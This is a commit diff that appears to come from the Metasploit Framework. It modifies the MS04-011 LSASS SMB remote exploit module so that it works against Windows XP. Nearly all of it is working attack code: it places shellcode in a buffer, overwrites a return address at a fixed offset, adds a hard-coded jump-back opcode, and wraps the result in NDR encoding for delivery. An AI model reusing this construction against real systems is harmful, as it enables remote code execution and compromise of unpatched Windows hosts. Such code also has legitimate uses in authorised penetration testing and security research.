This fixes #44. The XP string was missing NDR encoding and null termination.

git-svn-id: file:///home/svn/framework3/trunk@4511 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/smb/ms04_011_lsass.rb

@@ -97,8 +97,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 		
 		# Check the remote OS name and version
 		os = smb_peer_os
-		string = ''
+		buff = ''
 		case os
+
 			# Windows 2000 requires that the string be unicode formatted
 			# and give us a nice set of registers which point back to
 			# the un-unicoded data. We simply return to a nop sled that
@@ -108,7 +109,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 				str = rand_text_alphanumeric(3500)
 				str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
 				str[2104, payload.encoded.length ] = payload.encoded
-				string = NDR.UnicodeConformantVaryingString(str)
+				buff = NDR.UnicodeConformantVaryingString(str)
+
 			# Windows XP is a bit different, we need to use an ascii
 			# buffer and a jmp esp. The esp register points to an
 			# eight byte segment at the end of our buffer in memory,
@@ -116,17 +118,20 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 			# buffer, giving us about 1936 bytes of space for a
 			# payload.				
 			when /Windows 5\.1/
-				str = rand_text_alphanumeric(7000)
+				str = rand_text_alphanumeric(7000) + "\x00\x00"
 				str[0, payload.encoded.length ] = payload.encoded
 				str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
 				str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
-				string = str
+				str[6998, 2] = "\x00\x00"
+				buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
+
+			# Unsupported target
 			else
 				print_status("No target is available for #{ os }")
 				return
 		end
 
-		stub = string + 
+		stub = buff + 
 			NDR.long(rand(0xFFFFFF)) + 
 			NDR.UnicodeConformantVaryingString('') +
 			NDR.UnicodeConformantVaryingString('') +